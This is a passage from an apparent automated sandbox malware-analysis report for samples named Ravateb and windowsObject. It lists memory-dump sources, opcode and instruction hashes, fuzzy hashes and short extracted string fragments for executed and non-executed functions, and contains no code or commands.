          • Opcode Fuzzy Hash: 90b1aed113a72b28ca0b4ba3c188ecde98286e155ef516576b737e5d07e3b398
          • Instruction Fuzzy Hash: EAF0A931B1CD2E4BA56CA68CB04117573D1EF54760B14417FD44FC368BED28BC4682D5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8e122cebd2afe40b8593caae372254affcbf32c862e763f22b174f6de7c33c92
          • Instruction ID: 7a0416e99fd72d12f34e11b4cd86c59b3f41beba5b86197c012d54763fdfceff
          • Opcode Fuzzy Hash: 8e122cebd2afe40b8593caae372254affcbf32c862e763f22b174f6de7c33c92
          • Instruction Fuzzy Hash: 84F08131B1CE6E4BE56CA688B0410B573D1EF68360B14457FD44FC328AEE28AC4686A9
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a6f422244eb19c78c14e7aecc9be3895a33e9ce93ed253b2e41b9e2965166c11
          • Instruction ID: 97c843107f205301411559fd194c6a5b7429c9dfc196c8fa31dcff1d0b4452fb
          • Opcode Fuzzy Hash: a6f422244eb19c78c14e7aecc9be3895a33e9ce93ed253b2e41b9e2965166c11
          • Instruction Fuzzy Hash: A2F0F471C0DA5D2EEB64A794AC565FA3FA4EF42260F40007FE04DC7083F8192856C771
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4aaf437b0e8896d3ac067baa39a527c826c6fe1caa7be065bbfedb8a33c12601
          • Instruction ID: c90a3dcec995b8bc1eae13356ed4e57264077496f0a0e3cac5236effc714d763
          • Opcode Fuzzy Hash: 4aaf437b0e8896d3ac067baa39a527c826c6fe1caa7be065bbfedb8a33c12601
          • Instruction Fuzzy Hash: 26F0A431B1CD2E4B956CA68CB0510B973D1EF54360B2441BFD44FC328AED28AC4682A5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 019201b30880881b8d7c0cf3c9a29acccaa0dddfcddc3694c19a3512f0f4dc44
          • Instruction ID: 316ab784750705cee6b283addf5f52f172cbf870801f3a3aecbcdd6c7b9d9401
          • Opcode Fuzzy Hash: 019201b30880881b8d7c0cf3c9a29acccaa0dddfcddc3694c19a3512f0f4dc44
          • Instruction Fuzzy Hash: 66F0CD31B1CD2E4B956CAA8C704107673C0EF54350714457FD44FC328BFD18AC4682E5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7fbe75e2b0346db7608970fa84878107493627d4d12be6773e53082a28e87dab
          • Instruction ID: 47fdea4c2599eec7ec08946d57581642327a275d48a5503a883b0127e0f9a1dd
          • Opcode Fuzzy Hash: 7fbe75e2b0346db7608970fa84878107493627d4d12be6773e53082a28e87dab
          • Instruction Fuzzy Hash: 2FF06821B1CE2E4AD56CA68CB4410B973D0EF54720B6445BFD44ED318BFD2CBD4682E5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b85b486b73812452d0ed4604575607dd44b5c62fbdea4b6ce7d3d127335204af
          • Instruction ID: 44458f3b728ec5ff29717002bbdea8186fbc6cdac818b6c4b3e0a07012fd07e8
          • Opcode Fuzzy Hash: b85b486b73812452d0ed4604575607dd44b5c62fbdea4b6ce7d3d127335204af
          • Instruction Fuzzy Hash: 3EF05B31B1CD2D4A956CA68CB4411BA73D1EF54720B64457FD44FC318BED28AD4682D5
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 84bfb4d0d3279d5dd5df5b65d6c0319d4912a044316bd17ec222b0d87fae3f6f
          • Instruction ID: 2fb815de5b29f962cc5289527db503bc7d1ebf30585e9955e875746b15533ea8
          • Opcode Fuzzy Hash: 84bfb4d0d3279d5dd5df5b65d6c0319d4912a044316bd17ec222b0d87fae3f6f
          • Instruction Fuzzy Hash: A201AD3091CBDD4FDB56EB6888180A97FF0FF65200B0404EBD858C71A2EA754814C351
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1db5cd3ac35fef7f591cd9ea3ff8754e37d6045c785ed2b18a548dfcdca9104f
          • Instruction ID: efd9ad6b247bb70767f1b14363118f11d9dd05a0572fdc235f5fde6a1559b701
          • Opcode Fuzzy Hash: 1db5cd3ac35fef7f591cd9ea3ff8754e37d6045c785ed2b18a548dfcdca9104f
          • Instruction Fuzzy Hash: F8F0E52590C6545FDB56972CE849A887FF0DF8633431D429AE44CC72A7D2284C87C7D5
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5460e9a16fefb06414180d5ec0e971ce05e02cca685a64b4f1e1a0c514a9868d
          • Instruction ID: 91db34f9e9342930256a41d922983b362a957a582c05f8d3d0246d538444ab01
          • Opcode Fuzzy Hash: 5460e9a16fefb06414180d5ec0e971ce05e02cca685a64b4f1e1a0c514a9868d
          • Instruction Fuzzy Hash: 76E06D32D4D7AD4EEB55A798A8022ECBBA0EF01261F4000F7D00DD3083EA2929658B62
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b86435a6861e74a18160dc34abb6246396db4b64eee014238660127b47a23eb0
          • Instruction ID: fffe5ef100dc695a1beff134b8ac194c715924197f261371517dce269bd95ba0
          • Opcode Fuzzy Hash: b86435a6861e74a18160dc34abb6246396db4b64eee014238660127b47a23eb0
          • Instruction Fuzzy Hash: 21E0267280E2CC4BDB25A76448220ED7F60BF45200F4482E6D0488B493F9189A09C351
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 39bb7874d6298ed0c16043ca735d62299c4eb6214c76cefb9944420b7594d813
          • Instruction ID: 198271dca4bfdcc4c876c747125c48f44b40d9c4d3a46e5708fb3bcb6479908f
          • Opcode Fuzzy Hash: 39bb7874d6298ed0c16043ca735d62299c4eb6214c76cefb9944420b7594d813
          • Instruction Fuzzy Hash: 44E0C261E88C7E8ADA58E39814522F8BA90EF54640F8040F6D50EC3083ED285D89C7A6

          Non-executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: 571f46db2325301593486d4fe99971057c642c6513489cd4a9695462cb632686
          • Instruction ID: 8af2ab2a97dbdea00f6c5a2a21ed5a39d1b3149847ddc62cc3aab789580d2636
          • Opcode Fuzzy Hash: 571f46db2325301593486d4fe99971057c642c6513489cd4a9695462cb632686
          • Instruction Fuzzy Hash: 0C02F32190DB9D4FEB9AD76888512787FE1EF56750F0801FBC049C7193EE29AC89D362
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: PS=$XS=$_$`S=$eM_$hS=$pS=$xS=
          • API String ID: 0-2040168174
          • Opcode ID: 3e1a73e925919d713aa2ec4c0790c5239d94c5aedd705e37014e00258c2bdd28
          • Instruction ID: 96333a85eaa2d604664c04a1520af76da6bef659ef031aec66182ccbf202b0e4
          • Opcode Fuzzy Hash: 3e1a73e925919d713aa2ec4c0790c5239d94c5aedd705e37014e00258c2bdd28
          • Instruction Fuzzy Hash: FE41A353E0D5F94BF625A7AC68921F97F919F0176470C42FBD0C84B097FC18998AC2B6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: PS=$XS=$_$`S=$eM_$hS=$pS=$xS=
          • API String ID: 0-2040168174
          • Opcode ID: 355fffa1651b5e1bae7b8154edc24d4e043b3a43f7ba85b94fb9977bce5a9c96
          • Instruction ID: 5b8d55f43436f5bc1af6f5073f7dfce1f5c26b2057208458abf955e9fa91adfb
          • Opcode Fuzzy Hash: 355fffa1651b5e1bae7b8154edc24d4e043b3a43f7ba85b94fb9977bce5a9c96
          • Instruction Fuzzy Hash: A531D552E0D5FA8BF626A7A864510F87F91DF02764B4C41FBD0C84B0DBFC18994AC276
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^$M_^$M_^$M_^$M_^ $M_^"$M_^*
          • API String ID: 0-4010336945
          • Opcode ID: 41da45f453e1e455166d200ccd8c62b5a5588be190080bcab4ab069a7d484b1e
          • Instruction ID: 084e0771a247a686054c10d03ccc770eb31e21fa53eb5d05c9fdc7d9b20c9789
          • Opcode Fuzzy Hash: 41da45f453e1e455166d200ccd8c62b5a5588be190080bcab4ab069a7d484b1e
          • Instruction Fuzzy Hash: 0A5146A7A085AD8BE316A6ADAC950E63FD0DF4132874942FBC1C8CB183FC246447C2B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^X$M_^Y$M_^^$M_^`$M_^a$M_^h$M_^i
          • API String ID: 0-2862321970
          • Opcode ID: e877808d17f05ebaa39276eb9407f279eb85d79a809f06a83839723323caa70b
          • Instruction ID: 20e95cb3382cb1f0c391462e5e0ba0b5eabab46c0c6fffdd84977d9f6d9efc41
          • Opcode Fuzzy Hash: e877808d17f05ebaa39276eb9407f279eb85d79a809f06a83839723323caa70b
          • Instruction Fuzzy Hash: 7A21B05290D3EA8BF722A6B859950E4BF91DF1A79071801FBC1D8DB083F818594BD263
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: KM_^$MM_^$OM_I$P=$_
          • API String ID: 0-673868255
          • Opcode ID: 2559e734e03b1629bdd3079abcec46c9bc0284b43e4fff7dd898df28d0e51d75
          • Instruction ID: 683e5d25065939c9951926d68b8cda33737796d1e264afc82ba9e1ea3da31bdb
          • Opcode Fuzzy Hash: 2559e734e03b1629bdd3079abcec46c9bc0284b43e4fff7dd898df28d0e51d75
          • Instruction Fuzzy Hash: 4BC1C753A0D9BE4BF625A3AC78520F97F91EF4166470843F7E0888F097FC15994AC2B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^$M_^$M_^ $M_^"
          • API String ID: 0-3014406608
          • Opcode ID: 2c35d1807dbfde39beeeb815b092996c35e52fae21f4029453444bb0da998aac
          • Instruction ID: c6ae91019dbe6c36ed637c78b5e83a234804e27fffdafa01e960fa001fca2a2c
          • Opcode Fuzzy Hash: 2c35d1807dbfde39beeeb815b092996c35e52fae21f4029453444bb0da998aac
          • Instruction Fuzzy Hash: FC91296290C5BE4BE715A7ACA8950E63FD1DF51328B4842F7D0CCCB183FD28A486C2B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^$M_^$M_^ $M_^"
          • API String ID: 0-3014406608
          • Opcode ID: 245e726113106d40dacf050ff2f96590b807d5a44eb4d73ac921bb4ba5fd8532
          • Instruction ID: 343293f3ff68caa258fa0e6339ab782696d0232f2717804027d59ff6b5662efc
          • Opcode Fuzzy Hash: 245e726113106d40dacf050ff2f96590b807d5a44eb4d73ac921bb4ba5fd8532
          • Instruction Fuzzy Hash: 11912A6290C5BE4BE715A7ACA8950E63FD1DF51328B4842F7D0CCCB183FD28A486C6B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^$M_^$M_^ $M_^"
          • API String ID: 0-3014406608
          • Opcode ID: 7f413fa97e0b8d1fa9d39dd98f8cc92cc90832079c2294454878214ceaaca733
          • Instruction ID: a825f5c7be9de00094b399ad054ebf05a2b7f4ba18d1440f62eb2c1b5c8de2c1
          • Opcode Fuzzy Hash: 7f413fa97e0b8d1fa9d39dd98f8cc92cc90832079c2294454878214ceaaca733
          • Instruction Fuzzy Hash: 6C813A7290C5AE4BE715A76C98950E63BD1EF51368B4842F7D0CCCB183FD28A487C6B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: X=$(X=$0X=$\M_^
          • API String ID: 0-763070320
          • Opcode ID: 3d90f9f5382f21b2c3df3cdf68109a9afe56d1f77ae1b896bf137a69288ae15a
          • Instruction ID: 41ab850b89c0367f4488bd320243d11b294c1ee259c5739cf2b7e4ae8e29dc95
          • Opcode Fuzzy Hash: 3d90f9f5382f21b2c3df3cdf68109a9afe56d1f77ae1b896bf137a69288ae15a
          • Instruction Fuzzy Hash: 61617F17A0E9BE4BF62576AC78920F97F51DF4237470882F7D0C85A093BC19698BC2B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8M_H$8}=$9M_H$Hn=
          • API String ID: 0-4005445763
          • Opcode ID: 36c7754d295544cd134bb4d93ddca452802eaa07b152f2ffb86568d8b35d5110
          • Instruction ID: ad983bddeb282b5f56416d40bfb2a38db6aa00fbd187935b36d3bad4086dcb9b
          • Opcode Fuzzy Hash: 36c7754d295544cd134bb4d93ddca452802eaa07b152f2ffb86568d8b35d5110
          • Instruction Fuzzy Hash: 4341A151F2CD9E4AEB9CE6B848591B577D3EBE429174C85B7C04AC3186FD18A803D361
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^$M_^$M_^ $M_^"
          • API String ID: 0-3014406608
          • Opcode ID: 7c660566657bdea986b083cb62308e6336d683a5088ad8d97f097cddcc1e36de
          • Instruction ID: dc1f7fc1df5ef037e0bce365ecebae531a8d6cd2cfffcca56fb1627fd7818748
          • Opcode Fuzzy Hash: 7c660566657bdea986b083cb62308e6336d683a5088ad8d97f097cddcc1e36de
          • Instruction Fuzzy Hash: 265125679095BD8BE216A6ADA8950E63FD0DF1132C74942FBC0CC8B183FC256487C6B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^4$M_^7$M_^?$M_^@
          • API String ID: 0-3924494700
          • Opcode ID: e2f5a7a1ab58d5e1f0a8eb95e3cc0263910cf6832bf7bada361a4f5e8309996e
          • Instruction ID: f67175a3d3c40bd6d81ef5289440eb8f57ee40466c44c90b50d72db340c35ad9
          • Opcode Fuzzy Hash: e2f5a7a1ab58d5e1f0a8eb95e3cc0263910cf6832bf7bada361a4f5e8309996e
          • Instruction Fuzzy Hash: 2141D43790842D46E3117BBCB8051E93B52DF44779B4543FAD8D8AB053BD3428D6C6E4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: M_^3$M_^=$M_^E$M_^G
          • API String ID: 0-3261076121
          • Opcode ID: e61fbbd78c942185abe3fae4b610da52c435be0bb09c4e4ffe8b45fa82cd024e
          • Instruction ID: c6ccef569cc4f1fe7df9911bcf1b8767a629016530921dfb40b28c25c330ae23
          • Opcode Fuzzy Hash: e61fbbd78c942185abe3fae4b610da52c435be0bb09c4e4ffe8b45fa82cd024e
          • Instruction Fuzzy Hash: 3421B177A14A2D8AD2126E78A8010D8B7C1EF9432578607F6C199DB083FA31B54686A0

          Executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID: 6$VUUU$VUUU$gfff
          • API String ID: 0-350004380
          • Opcode ID: 4b25d5724e2c973737e30fbfeb4558bcae42a3f18b8f4b80ded6a4fa053acb02
          • Instruction ID: 3ac1aeca014df6239a8fa1cc772297f3b94d8635eca05335b4bf394c1c4a675c
          • Opcode Fuzzy Hash: 4b25d5724e2c973737e30fbfeb4558bcae42a3f18b8f4b80ded6a4fa053acb02
          • Instruction Fuzzy Hash: 8E724734E1C96E4BEB5CEB6884456B87BE1EF94346F504279D44EC72D6FD28E806C3A0
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9ee87f7b029062af63086c35929b5ef744d696b177af3993dc268e32e2bd4fdd
          • Instruction ID: ed6a98e3941a22ab03422cf245f0ffad2d8424b740e438e7ba6a6042ecb8c79c
          • Opcode Fuzzy Hash: 9ee87f7b029062af63086c35929b5ef744d696b177af3993dc268e32e2bd4fdd
          • Instruction Fuzzy Hash: 4A223F30B1892D8FEB98EB5CC455BA9B7E2FF98301F504579E40DC3296EE28AC41C751
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8b75c5e8bbc5bf6b548b3b6f91fbaab8524876caf9782e953678c6aac0010484
          • Instruction ID: 533998b77844eb69f86c7c1098c494b962df1be4399e4ed1700b96bc37de0f81
          • Opcode Fuzzy Hash: 8b75c5e8bbc5bf6b548b3b6f91fbaab8524876caf9782e953678c6aac0010484
          • Instruction Fuzzy Hash: 1991F630A1C92D4BE75C9A5CD81567976E2FB88312F54817DE48EC32D7EE28E84282A1
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1596f9146c661f054e60b96984c251f0bf267be0bdaa72ae1d575a3b77d064cb
          • Instruction ID: 0f0070fd353b5cdd72caafb63f09fd2538ab53727d0d5343b582813ffee58465
          • Opcode Fuzzy Hash: 1596f9146c661f054e60b96984c251f0bf267be0bdaa72ae1d575a3b77d064cb
          • Instruction Fuzzy Hash: 15917752E0DAAE5FFB9AD37848591787FB1FF9229270841BAC048C70C7FD196816D3A1
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 445800c0d46ddd48a82179af3f105bcd6239bdc4b31793b86613205f740137ac
          • Instruction ID: 47014698427330104ae8ba1adfae218e10b0f744c75604a22b3bcaa2503c8345
          • Opcode Fuzzy Hash: 445800c0d46ddd48a82179af3f105bcd6239bdc4b31793b86613205f740137ac
          • Instruction Fuzzy Hash: F8811931E1892E8BE769DB9C84553B5B6E1FF48352F54457DD08EC3282FA28B942C3A0
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 431ad092a1c00828f19ea28c30477aeced168eab3a4241a55dfb3c77cf7bf494
          • Instruction ID: 173dffc1beecffb8e1b905c9264611e63cea9ba5c22e1a7d488fe5b86ba8c3aa
          • Opcode Fuzzy Hash: 431ad092a1c00828f19ea28c30477aeced168eab3a4241a55dfb3c77cf7bf494
          • Instruction Fuzzy Hash: 62312B22C0EADB9FEB56A7B584554A6BF70FF9234134845FBD08AC6497FD18A808C371
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 776f5138134db7898822de9aafc4fe39192d9cac4a5847729254d3c441ad9d82
          • Instruction ID: c3eee63345c10ef9da41aeb29a8ce4eea07bc3c1b4ee65609bbf9a3d0341159d
          • Opcode Fuzzy Hash: 776f5138134db7898822de9aafc4fe39192d9cac4a5847729254d3c441ad9d82
          • Instruction Fuzzy Hash: 7721082181DA9B4FDB56B3748455896BFB0FF6230134885BBD0CAC2597FD28E849C3A1
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f7a748bacc5e2d6b2da45d0d66ff8fc463e4299f3a0417fc8edb07e5a5ff93e8
          • Instruction ID: 3d0fb7174f34af9501e8b9665cc043495afd1876a56d1e4b1564e517e277e381
          • Opcode Fuzzy Hash: f7a748bacc5e2d6b2da45d0d66ff8fc463e4299f3a0417fc8edb07e5a5ff93e8
          • Instruction Fuzzy Hash: CC419131A0891D4FEF98EF18C845BA977E1FB98352F004579D40DC3286EE35E952CB60
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0aea5151defad8d16cecc10c3befb9ed732228d953818b164a53c65ac45181a1
          • Instruction ID: 0aef5c626aa0799b7406623ebdaa014c365085a4727dfb21c86f92892411ffad
          • Opcode Fuzzy Hash: 0aea5151defad8d16cecc10c3befb9ed732228d953818b164a53c65ac45181a1
          • Instruction Fuzzy Hash: 60316371A0891D9FDB94EB6884556B9BBF1FB9C312F40053ED44EE3251EF346841CB60
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a74af5f90b61c70ab6592d3ce5cf2a6a720c2baf1e1a468074587270f96e0815
          • Instruction ID: a3be972ff8d35e9b7742ef23ac9cea091c1f52e0b6a0461611b8400166959beb
          • Opcode Fuzzy Hash: a74af5f90b61c70ab6592d3ce5cf2a6a720c2baf1e1a468074587270f96e0815
          • Instruction Fuzzy Hash: D331BF30A0866D4FDB86EB6884586A93FE1EF4A311F0501F6D449CB2A7DA29A841C751
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a88e6b35341fb110c73521b1bf74605c7c9dfc01b5afe29e256959d725d38a62
          • Instruction ID: ca247e59623a4b56c869c81b87a9b8b67c196b727e604cd4bc197006a5754d5d
          • Opcode Fuzzy Hash: a88e6b35341fb110c73521b1bf74605c7c9dfc01b5afe29e256959d725d38a62
          • Instruction Fuzzy Hash: 8021E63190D16E8BEB58EAA4C4416FA3B70FF81366F40017DE44E871D2FD287A16D360
